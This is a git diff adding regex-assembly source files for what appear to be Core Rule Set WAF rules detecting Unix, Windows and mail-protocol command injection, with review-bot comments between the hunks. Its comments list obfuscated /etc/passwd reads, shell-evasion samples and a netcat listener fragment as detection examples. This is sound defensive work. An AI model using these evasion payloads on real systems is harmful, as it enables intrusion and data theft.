@@ -0,0 +1,235 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932125 (RCE Windows command injection - PowerShell aliases) +##! +##! This list comes from the powershell source code. Can be updated using this oneliner: +##! curl -s https://raw.githubusercontent.com/PowerShell/PowerShell/master/src/System.Management.Automation/engine/InitialSessionState.cs -o - | awk -F\" '/new SessionStateAliasEntry\("/ { print $2; }' +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff@ + +##!+ i + +##! Note: the quoting prefixes are part of the command prefixes, except for ^ +##! which, for unknown reasons, is not part of the expression + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##! ;cmd + ; + ##! {cmd + \{ + ##! |cmd + \| + ##! ||cmd + \|\| + ##! &cmd + & + ##! &&cmd + && + ##! \ncmd + \n + ##! \rcmd + \r + ##! `cmd + ` + ##!=> + + ##! match possible white space between prefix expressions + \s* + ##!=> + + ##! commands prefix + ##!> assemble + ##! (cmd) + \( + ##! ,cmd + , + ##! @cmd + @ + ##! 'cmd' + ' + ##! "cmd" + \" + ##! spacing+cmd + \s + ##!< + ##!=> + + * + ##!=> + + ##! paths prefix + ##!> assemble + ##! /path/cmd + [\w'\"\./]+/ + ##! C:\Program Files\cmd + [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c + ##! \\net\share\dir\cmd + [\^\.\w '\"/\x5c]*\x5c + ##!< + ##!=> + + ?[\"\^]* + ##!=> + + ##!> cmdline windows + + ac@ + asnp@ + cd@ + ##! disabled for FP: cat@ + chdir@ + clc@ + ##! disabled for FP: clear + clhy@ + cli@ + clp@ + cls + clv@ + cnsn + ##! 
disabled for FP: compare@ + ##! disabled for FP: copy@ + cp@ + cpi@ + cpp@ + cvpa@ + dbp@ + del@ + diff@ + dir@ + dnsn + ebp@ + epal@ + epcsv@ + epsn@ + ##! disabled for FP: erase@ + etsn@ + exsn@ + fc@ + fl@ + foreach@ + ft@ + fw@ + gal@ + gbp@ + gc@ + gci@ + gcm@ + gcs@ + gdr@ + gerr + ghy@ + gi@ + gjb@ + gl@ + gm@ + gmo@ + gp@ + gps@ + gpv + ##! disabled for FP: group + gsn@ + gsnp@ + gsv@ + gu@ + gv@ + gwmi@ + ##! disabled for FP: h + ##! disabled for FP: history + icm@ + iex@ + ihy@ + ii@ + ipal@ + ipcsv@ + ipmo@ + ipsn@ + irm@ + ise@ + iwmi@ + iwr@ + ##! disabled for FP: kill + ls + man@ + md@ + ##! disabled for FP: measure + mi@ + mount@ + ##! disabled for FP: move + mp@ + mv@ + nal@ + ndr@ + ni@ + nmo@ + npssc + nsn@ + nv@ + ogv@ + ##! disabled for FP: oh + popd@ + pushd@ + ##! disabled for FP: pwd + ##! disabled for FP: r + rbp@ + rcjb@ + rcsn + rd@ + rdr@ + ren@ + ri@ + rjb@ + rm@ + rmdir@ + rmo@ + rni@ + rnp@ + rp@ + rsn@ + rsnp@ + rujb + rv@ + rvpa@ + rwmi@ + sajb@ + sal@ + saps@ + sasv@ + sbp@ + sc@ + ##! disabled for FP: select + ##! disabled for FP: set + shcm + si@ + sl@ + ##! disabled for FP: sleep + sls@ + ##! disabled for FP: sort + sp@ + spjb@ + spps@ + spsv@ + ##! disabled for FP: start + sujb + sv@ + swmi@ + ##! disabled for FP: tee + trcm@ + ##! disabled for FP: type + ##! disabled for FP: where + wjb@ + ##! disabled for FP: write@ + ##!< +##!< diff --git a/regex-assembly/932130.ra b/regex-assembly/932130.ra new file mode 100644 index 0000000000..bd183fc2af --- /dev/null +++ b/regex-assembly/932130.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> include 932130 diff --git a/regex-assembly/932131.ra b/regex-assembly/932131.ra new file mode 100644 index 0000000000..d769518b1a --- /dev/null +++ b/regex-assembly/932131.ra 
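Review bot: The comment near the top of 932125.ra, `the quoting prefixes are part of the command prefixes, except for ^ which, for unknown reasons, is not part of the expression`, is contradicted by the paths-prefix block, where `\^` appears in every class (`[\x5c'\"\^]*`, `[\^\.\w '\"/\x5c]*`, `?[\"\^]*`); only the "commands prefix" alternation (`\(`, `,`, `@`, `'`, `\"`, `\s`) lacks it. "For unknown reasons" should not survive review: either add `\^` to that alternation if a caret directly before an alias is meant to be accepted, or replace the sentence with the actual reason (if the `##!> cmdline windows` processor already inserts caret handling, say that) so nobody re-adds it by mistake. The `##!> cmdline windows` block opens in the first part of this hunk and the alias list closes here.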
@@ -0,0 +1,7 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Rule 932131 uses the same regular expression as 932130 on a +##! different target. + +##!> include 932130 diff --git a/util/regexp-assemble/regexp-932140.data b/regex-assembly/932140.ra similarity index 63% rename from util/regexp-assemble/regexp-932140.data rename to regex-assembly/932140.ra index 05980b6c0d..ddab7e068c 100644 --- a/util/regexp-assemble/regexp-932140.data +++ b/regex-assembly/932140.ra @@ -1,2 +1,5 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + \bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do \bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) diff --git a/regex-assembly/932175.ra b/regex-assembly/932175.ra new file mode 100644 index 0000000000..afb7620e74 --- /dev/null +++ b/regex-assembly/932175.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prevent command aliasing + +##! starting tokens prefix +##!> assemble + \b + ##!=> + ##!> cmdline unix + alias + ##!< + ##!=> + + ##! match white space between command and arguments + \b\s+ + ##!=> + + ##! match the alias name + ['"\w!%,@]+ + ##!=> + + ##! match equals something + =\S + ##!=> + +##!< diff --git a/regex-assembly/932200.ra b/regex-assembly/932200.ra new file mode 100644 index 0000000000..e2dcc4d84a --- /dev/null +++ b/regex-assembly/932200.ra 
@@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/regex-assembly/932205.ra b/regex-assembly/932205.ra new file mode 100644 index 0000000000..84695af32d --- /dev/null +++ b/regex-assembly/932205.ra @@ -0,0 +1,29 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prefix to prevent the first `?` (query string marker +##! in URLs) from matching any of the later expressions. +##! If the URL does not have a query string, then instead +##! look for the first `;`. +##! Prefix and suffix markers also form two capture groups +##! that are used for processing and logging in the rule. +##!^ ^[^.]+\.[^?;]+[?;](.*( +##!$ )) + +##! The following expressions in this file must be identical to the +##! ones in 932200. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/regex-assembly/932206.ra b/regex-assembly/932206.ra new file mode 100644 index 0000000000..dce24e55f5 --- /dev/null +++ b/regex-assembly/932206.ra 
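Review bot: 932205.ra repeats the five expressions of 932200.ra verbatim, guarded only by the comment `The following expressions in this file must be identical to the ones in 932200`, and 932206.ra (next hunk) repeats them a third time. The assembler already supports sharing, as `##!> include charset-specification` in 920600.ra and `##!> include 932130` in 932131.ra show, so the common body could live in one include file with each rule file keeping only its own `##!^` / `##!$` lines, and a future edit to the list could no longer drift between 932200, 932205 and 932206. If the include directive cannot be combined with a per-file prefix and suffix, please say so in the comment so the duplication reads as deliberate rather than accidental.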
@@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Prefix to ensure that the rule only matches when the +##! value of the Referer header is not a URL (illegal header +##! value). +##!^ ^[^.]*? + +##! The following expressions in this file must be identical to the +##! ones in 932200. + +##! - bar;cd+/etc;/bin$u/ca*+passwd +##! - foo;ca\t+/et\c/pa\s\swd +##! - foo;c'at'+/etc/pa's'swd +[*?`\x5c'][^/\n]+/ +/[^/]+?[*?`\x5c'] +##! - foo;cat$u+/etc$u/passwd +##! - foo;c$-at+/et$-c/pas$-swd +##! - foo;c$_at+/et$_c/pas$_swd +##! - foo;c$?at+/et$?c/pas$?swd +##! - foo;c$*at+/et$*c/pas$*swd +##! - foo;c$@at+/et$@c/pas$@swd +##! - foo;c$!at+/et$!c/pas$!swd +##! - foo;c$$at+/et$$c/pas$$swd +\$[({\[#@!?*\-_$a-zA-Z0-9] diff --git a/regex-assembly/932210.ra b/regex-assembly/932210.ra new file mode 100644 index 0000000000..1d44a18737 --- /dev/null +++ b/regex-assembly/932210.ra @@ -0,0 +1,77 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list can be updated using: +##! curl -ks https://raw.githubusercontent.com/sqlite/sqlite/master/src/shell.c.in | grep -oE '^\s+"(\.[a-z0-9]+)' | cut -f2 -d. + +##!^ ;\s*\.\s*[\"']? + +archive +auth +backup +bail +binary +cd +changes +check +clone +connection +databases +dbconfig +dbinfo +dump +echo +eqp +excel +exit +expert +explain +filectrl +fullschema +headers +help +import +imposter +indexes +iotrace +limit +lint +load +log +mode +nonce +nullvalue +once +open +output +parameter +print +progress +prompt +quit +read +recover +restore +save +scanstats +schema +selftest +separator +session +sh +sha3sum +shell +show +stats +system +tables +testcase +testctrl +timeout +timer +trace +unmodule +vfsinfo +vfslist +vfsname +width diff --git a/regex-assembly/932220.ra b/regex-assembly/932220.ra new file mode 100644 index 0000000000..c2bc6307c5 --- /dev/null +++ b/regex-assembly/932220.ra 
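Review bot: The prefix `^[^.]*?` implements "the Referer header is not a URL" as "no dot appears before the match", which also admits legitimate Referer values pointing at dotless hosts — `http://localhost/path'` satisfies the prefix and then `/[^/]+?[*?`\x5c']`, and single-label intranet names behave the same way — so the comment `the value of the Referer header is not a URL (illegal header value)` overstates what is actually checked. A line such as `##! Approximation: a value with no '.' before the match is treated as a non-URL; dotless hosts (localhost, single-label names) still reach the expressions below.` would set expectations for whoever triages the false positives. As in 932205, the alternatives are copied from 932200 under a "must be identical" comment; `##!> include 932200`, the approach 932131 takes with 932130, would remove the drift risk.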
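Review bot: The documented refresh command for this word list, `curl -ks https://raw.githubusercontent.com/sqlite/sqlite/master/src/shell.c.in | ...`, disables TLS certificate verification with `-k`, so a maintainer regenerating the list on a hostile network can be served a tampered `shell.c.in` and end up silently dropping `shell`, `system` or `load` from a detection rule. The GitHub raw endpoint has a valid certificate and needs no `-k`; change the comment to `##! curl -s https://raw.githubusercontent.com/sqlite/sqlite/master/src/shell.c.in | grep -oE '^\s+"(\.[a-z0-9]+)' | cut -f2 -d.`. Pinning a commit or tag instead of `master` would additionally make the regenerated list reproducible against the version that was reviewed.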
@@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932220 (RCE Unix command injection) +##! +##! This list comes from (and should be in sync) the `unix-shell.data` file. + +##! Not all of the prefixes for the command words will be legal. +##! We've decided to use the same prefix as in 932100 and 932105 here, +##! because we don't know exactly what things are possible after a pipe and +##! we don't want to overcomplicate things by introducing another prefix variation. +##! Not all of the prefixes matched by the expression will actually be valid. + +##!+ i + +##!^ .\| + +##!> assemble + \s* + ##!> include unix-shell-evasion-prefix + + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl2 -- @ "" ~ "" + ##!< +##!< diff --git a/regex-assembly/932230.ra b/regex-assembly/932230.ra new file mode 100644 index 0000000000..7b298ea668 --- /dev/null +++ b/regex-assembly/932230.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932230 (RCE for commands of two and three character words) +##! +##! Per discussion in https://github.com/coreruleset/coreruleset/issues/2632, we decided +##! to extend the cmdline evasion regex, so we are applying the evasion to a subset of the +##! original 93210(0|5) rules: the subset of commands from two or three characters that might pose +##! a greater risk of false positives. + +##!+ i + +##!$ \b + +##!> assemble + ##!> include unix-shell-evasion-prefix + + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 + ##!< +##!< diff --git a/regex-assembly/932231.ra b/regex-assembly/932231.ra new file mode 100644 index 0000000000..22b5e8b890 --- /dev/null +++ b/regex-assembly/932231.ra 
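Review bot: The header of 932220 says the same thing twice — `Not all of the prefixes for the command words will be legal.` and, three lines later, `Not all of the prefixes matched by the expression will actually be valid.` — and `This list comes from (and should be in sync) the unix-shell.data file.` is missing a word. The include lines below reference `unix-shell-upto3` and `unix-shell-fps-pl2` rather than any `unix-shell.data`, so after this rename the filename in the comment may also be stale. Suggest collapsing to `##! This list comes from, and must be kept in sync with, the unix-shell-* include files.` and `##! Not every prefix matched here is a legal shell construct; we reuse the 932100/932105 prefix rather than introduce a pipe-specific variant.`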
@@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932231 (RCE Unix command injection part 3/4) +##! +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff+ + +##! Special regexp case for the '.' (source) command to prevent FP: + + +##!> assemble + ##!> include unix-shell-evasion-prefix + + \.\s.*\b +##!< diff --git a/regex-assembly/932232.ra b/regex-assembly/932232.ra new file mode 100644 index 0000000000..50af9d0131 --- /dev/null +++ b/regex-assembly/932232.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932232 (RCE Unix command injection part 4/4) + +##!$ \b + +##!> assemble + ##!> include unix-shell-evasion-prefix + + ##!> assemble + ##!> cmdline unix + ##!> include unix-shell-pl3 + ##!< + ##!< +##!< diff --git a/regex-assembly/932235.ra b/regex-assembly/932235.ra new file mode 100644 index 0000000000..df2b696e3b --- /dev/null +++ b/regex-assembly/932235.ra @@ -0,0 +1,11 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include unix-shell-evasion-prefix + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932236.ra b/regex-assembly/932236.ra new file mode 100644 index 0000000000..205a7cdb29 --- /dev/null 
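Review bot: The header comment of 932231 (`Word list for rule 932231`, the paragraph about appending `+` to entries with the `diff+` example) describes a command word list, but the only pattern in the file is the special case for the `.` (source) command, `\.\s.*\b`, so there is no list for that guidance to apply to and it reads as boilerplate carried over from an older file. The note about `\b following the regexp` also refers to a `##!$ \b` suffix that this file, unlike 932230 and 932232, does not declare — here the `\b` is part of the pattern itself. A header like `##! Rule 932231: special case for the '.' (source) command. Requires whitespace after the dot and, via the trailing \b, at least one word character somewhere after it, to limit FPs on stray dots.` would describe what the file actually does.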
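Review bot: 932232 declares no `##!+ i` flag, while its siblings 932230 and, in particular, 932238 — which assembles the same `unix-shell-pl3` list with the start-of-string prefix — do, so this file's alternatives would be case-sensitive unless the rule lowercases the target first. If the rule does not apply `t:lowercase`, `CuRl` bypasses 932232 but not 932238, which is an odd asymmetry between two rules built from the same list; add `##!+ i` after the header, as in 932230, or leave a comment stating why case-sensitivity is intended here.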
+++ b/regex-assembly/932236.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string.ra +##!< +##!=> + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932237.ra b/regex-assembly/932237.ra new file mode 100644 index 0000000000..db57f72d9d --- /dev/null +++ b/regex-assembly/932237.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!^ \b + +##!$ (?:\b|\W) + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932238.ra b/regex-assembly/932238.ra new file mode 100644 index 0000000000..a11509f5a9 --- /dev/null +++ b/regex-assembly/932238.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string +##!< +##!=> + +##!> assemble + ##!> cmdline unix + ##!> include unix-shell-pl3 + ##!< +##!< diff --git a/regex-assembly/932239.ra b/regex-assembly/932239.ra new file mode 100644 index 0000000000..a37b41ea2a --- /dev/null 
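Review bot: `##!> include unix-shell-evasion-prefix-start-of-string.ra` carries a `.ra` extension, whereas every other include of that file in this change (932238, 932239, 932250, 932260) names it `unix-shell-evasion-prefix-start-of-string`. Depending on how the processor resolves include names this either works by accident or looks up a non-existent `...start-of-string.ra.ra`, which would leave 932236 with an empty evasion prefix and silently broaden or break the rule; drop the extension so the line reads `##!> include unix-shell-evasion-prefix-start-of-string`. Diffing the assembled 932236 regex against 932239's prefix would confirm the include actually resolved.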
+++ b/regex-assembly/932239.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string +##!< +##!=> + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932240.ra b/regex-assembly/932240.ra new file mode 100644 index 0000000000..12259d781c --- /dev/null +++ b/regex-assembly/932240.ra @@ -0,0 +1,44 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Rule 932240 (Generic RCE Unix command evasion detection) +##! +##! Conceptually, we want to match: +##! - at least one character +##! - at least one character from an evasion technique + +##!+ i + +##! The previous cmdline evasion detection was based on the one from modsecurity: `[\x5c'\"]*` +##! We extended the evasion detection from the cmdline processor with `(?:\$[a-z0-9_@?!#{*-]*)?(?:\x5c)?` to match: +##! - non-existing vars: cu$@rl, una$$me -a, uname$$u -a +##! - vars + spacing: v='u';cu$v\r\l google.com +##! - globbing pattern expansion: {n$u\c$u,-nlvp,777} +##! - globbing: garb=cur[l];$garb+google.com + +##! kill '-'9 +##!> assemble + [a-z0-9_-]+ + ##!=> + \s*['\"][^'\"\s]+['\"] + ##!=> + [a-z0-9_-]+ +##!< + +##!> assemble + [a-z0-9_-]+ + ##!=> + ##! py""thon + ['\"]['\"]+ + [\x5c\[\]]+ + \$+[\x5ca-z0-9_@?!#{*-]+ + ##! process substitution + `` + \$\(\) + <\(\) + >\(\) + ##!=> + + \s*[a-z0-9_-]+ + ##!=> +##!< 
diff --git a/regex-assembly/932250.ra b/regex-assembly/932250.ra new file mode 100644 index 0000000000..da48fa621b --- /dev/null +++ b/regex-assembly/932250.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932250 (RCE Unix command injection) + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##!> assemble + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 -- @ "" ~ "" + ##!< + ##!=> + ##! This pattern is an approximation of the pattern used by the cmdline + ##! processor for `@`. + ##! This pattern is used across multiple files, change with care. + [\s<>&|)] + ##!< +##!< diff --git a/regex-assembly/932260.ra b/regex-assembly/932260.ra new file mode 100644 index 0000000000..d94b7912c0 --- /dev/null +++ b/regex-assembly/932260.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932260 (RCE Unix command injection) + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##! These patterns are approximations of the patterns used by the cmdline + ##! processor for `@` and `~`. + ##! These patterns are used across multiple files, change with care. + ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|)] ~ \S +##!< diff --git a/regex-assembly/932300.ra b/regex-assembly/932300.ra new file mode 100644 index 0000000000..9477717f8b --- /dev/null +++ b/regex-assembly/932300.ra 
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ (?is)\r\n.*?\b
+
+##! - SMTP Commands
+EHLO [a-zA-Z-\.]{1,255}
+HELO [a-zA-Z-\.]{1,255}
+MAIL FROM:<.{1,64}@.{1,255}>
+RCPT TO:(?:<.{1,64}@.{1,255}>|(?: ))?<.{1,64}>
+VRFY (?:.{1,64} <.{1,64}@.{1,255}>|.{1,64}@.{1,255})
+EXPN (?:.{1,64})
+AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))
+
+##! - SMTP Commands without params
+STARTTLS\b
+RSET\b
+NOOP\b(?: .{1,255})?
diff --git a/regex-assembly/932301.ra b/regex-assembly/932301.ra
new file mode 100644
index 0000000000..a19c80cc0c
--- /dev/null
+++ b/regex-assembly/932301.ra
@@ -0,0 +1,13 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ (?s)\r\n.*?\b
+
+##! - SMTP Commands without or optional params
+DATA
+QUIT
+HELP(?: .{1,255})?
+
+##! - SMTP Commands with params
+
+##! Not covered - X Command (client extensions)
diff --git a/regex-assembly/932310.ra b/regex-assembly/932310.ra
new file mode 100644
index 0000000000..0aaeadcc52
--- /dev/null
+++ b/regex-assembly/932310.ra
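Review bot: The `AUTH` alternative only accepts an initial response that is a bare `=` or base64 with `==`/`=` padding, `(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=)`, so any initial response whose decoded length is a multiple of three is unpadded and does not match — a 12-byte PLAIN blob such as `\0user\0passwd` encodes to 16 unpadded characters and slips through — and `AUTH LOGIN` with no initial response is not matched at all. Making the padded tail optional, `(?:[\w+/]{4})+(?:[\w+/]{2}==|[\w+/]{3}=)?`, closes the padding gap; whether a bare `AUTH <mechanism>` should also match is a PL decision worth stating in a comment. 932320 carries the identical expression for POP3 and needs the same change. The `\w` in `[\w+/]` also admits `_`, which is base64url rather than standard base64 — harmless for detection, but worth a one-line comment so nobody "fixes" it later.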
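Review bot: The prefix in 932301 is `(?s)\r\n.*?\b`, without the `i` flag that 932300 (`(?is)`) and 932321 (`(?si)`) set, so `DATA`, `QUIT` and `HELP` are only matched in upper case. SMTP verbs are case-insensitive (RFC 5321 §2.4), so unless the rule lowercases the target before matching, `\r\nquit\r\n` or `\r\ndata\r\n` pass while the upper-case form is caught; change the marker to `##!^ (?is)\r\n.*?\b` to match its sibling. Conversely, if the rule does apply `t:lowercase`, the upper-case words in this file would never match anything, so one of the two — flag or transformation — needs checking against the rule definition.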
@@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! All IMAP4 commands start with a "tag" + +##!+ is +##!^ \r\n\w{1,50}\b[ ] + +##! IMAP4 Commands - PL2 + +##! - IMAP4Rev1 Commands - with params +APPEND (?:[\w\"\.\-\x5c\/%\*&#]+)?(?: \((?:[a-z\x5c\ ])+\))?(?: \"?\d{1,2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}\"?)? \{\d{1,20}\+?\} +AUTHENTICATE [a-z0-9-_]{1,20}\r\n +LSUB (?:[\w\"~\/\*#\.]+)? (?:[\w\"\.\x5c\/%\*&]+)? +STATUS (?:[\w\"\.\-\x5c\/%\*&]+)? \((?:UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\) +UID (?:COPY|FETCH|STORE) (?:[0-9,:\*]+)? +##! - IMAP4Rev1 Commands Extensions - with params +DELETEACL (?:[\w\"\.\-\x5c\/%\*&]+)? +GETACL (?:[\w\"\.\-\x5c\/%\*&]+)? +MYRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)? +LISTRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)? +SETACL (?:[\w\"\.\-\x5c\/%\*&]+)? [+-][lrswipckdxtea]+? diff --git a/regex-assembly/932311.ra b/regex-assembly/932311.ra new file mode 100644 index 0000000000..d1d76f4f99 --- /dev/null +++ b/regex-assembly/932311.ra 
@@ -0,0 +1,44 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! All IMAP4 commands start with a "tag" + +##! TDB: representing charset and language (if needed) +##!+ is +##!^ \r\n\w{1,50}\b[ ] + +##! - IMAP4 Commands - PL3 + +##! - IMAP4Rev1 Commands - with params +CREATE [\w\"\.\-\x5c\/%\*&#]+ +COPY [0-9,:\*]+ [\w\"\.\-\x5c\/%\*&#]+ +DELETE [\w\"\.\-\x5c%\*&#]+ +EXAMINE [\w\"\.\-\x5c%\*&#]+ +FETCH [0-9,:\*]+ +LIST [\w\"~\-\x5c\/\*#\.]+? [\w\"\.\-\x5c\/%\*&#]+ +LOGIN [a-z0-9-_\.\@]{1,40} .*? +RENAME [\w\"\.\-\x5c\/%\*&#]+? [\w\"\.\-\x5c\/%\*&#]+ +SELECT [\w\"\.\-\x5c\/%\*&#]+ +STORE [0-9,:\*]+? [+-]?FLAGS(?:\.SILENT)? (?:\(\x5c[a-z]{1,20}\))? +SUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+ +UNSUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+ +##! Search has plenty of variants +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (KEYWORD \x5c)?(?:ALL|ANSWERED|BCC|DELETED|DRAFT|FLAGGED|RECENT|SEEN|UNANSWERED|UNDELETED|UNDRAFT|UNFLAGGED|UNSEEN|NEW|OLD) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BODY|CC|FROM) .{1,255} +SEARCH(?: CHARSET [\w\-_\.]{1,40})? HEADER .{1,100} .{1,255} +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:LARGER \d{1,20}|NOT .{1,255}|[0-9,:\*]+) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BEFORE|ON|SENTBEFORE|SENTON|SENTSINCE|SINCE) \"?\d{1,2}-\w{3}-\d{4}\"? +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:OR .{1,255} .{1,255}|SMALLER \d{1,20}|SUBJECT .{1,255}) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:TEXT .{1,255}|TO .{1,255}|UID [0-9,:\*]+?|UNKEYWORD (?:\x5c(Seen|Answered|Flagged|Deleted|Draft|Recent))) + +##! - IMAP4rev1 Commands - without params +CAPABILITY +CHECK +CLOSE +EXPUNGE +LOGOUT +NOOP +STARTTLS +UNAUTHENTICATE + +##! Not covered - X Command (client extensions) diff --git a/regex-assembly/932320.ra b/regex-assembly/932320.ra new file mode 100644 index 0000000000..b10c953c9d --- /dev/null +++ b/regex-assembly/932320.ra 
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! POP3 Commands - PL2
+
+##!+ is
+##!^ \r\n.*?\b
+
+##! POP3 Commands - with args
+LIST(?: \d+)?
